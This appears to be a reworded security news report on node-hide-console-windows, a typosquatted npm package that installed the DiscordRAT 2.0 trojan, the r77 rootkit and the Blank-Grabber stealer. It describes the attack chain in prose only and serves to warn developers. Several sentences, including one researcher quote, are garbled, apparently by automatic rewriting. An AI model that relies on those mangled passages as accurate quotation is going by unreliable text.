A new deceptive package has been discovered hidden in the npm package registry that implements an open source rootkit called r77marking the first time a rogue package has offered rootkit functionality.
The package in question is node-hide-console-windows, which mimics the legitimate npm package node-hide-console-window in what is an example of a typosquatting campaign. It was downloaded 704 times in the last two months before being removed.
ReversingLabs, which first detected the activity in August 2023, said the package “downloaded a Discord bot that facilitated the installation of an open source rootkit, r77,” adding that it “suggests that open source projects can increasingly seen as a way for malware to be distributed.”
The malicious code, according to the software supply chain security company, is contained in the package’s index.js file which, upon execution, retrieves an executable that runs automatically.
The executable in question is an open source C#-based Trojan known as DiscordRAT 2.0, which comes with features to remotely control a victim’s host via Discord using over 40 commands that make it easy to collect sensitive data and At the same time they deactivate the security software.
One of the instructions is “!rootkit”, which is used to launch the r77 rootkit on the compromised system. r77, actively maintained by bytecode77, is a “fileless ring 3 rootkit” that is designed to hide files and processes and can be bundled with other software or started directly.
This is far from the first time r77 has been used in malicious campaigns in the wild, with threat actors using it as part of attack chains distributing the SeroXen Trojan and cryptocurrency miners.
What’s more, two different versions of node-hide-console-windows have been found to get an open source information stealer called Blank-Grabber along with DiscordRAT 2.0, passing it off as a “visual code update.”
A notable aspect of the campaign is that it is built entirely on the foundations of components that are freely and publicly available online, requiring little effort on the part of threat actors to put it all together and open the “attack chain door.” supply is now open to low-risk individuals. actors.”
The research findings underscore the need for caution among developers when installing packages from open source repositories. Earlier this week, Fortinet FortiGuard Labs identified nearly three dozen modules with variations in coding style and execution methods that came equipped with data collection capabilities.
“The malicious actor or actors made an effort to make their packages appear trustworthy,” said security researcher Lucija Valentić.
“The actor or actors behind this campaign created an npm page that closely resembled the page of the legitimate package that was being manipulated with typos, and even created 10 versions of the malicious package to mirror the package they were imitating.”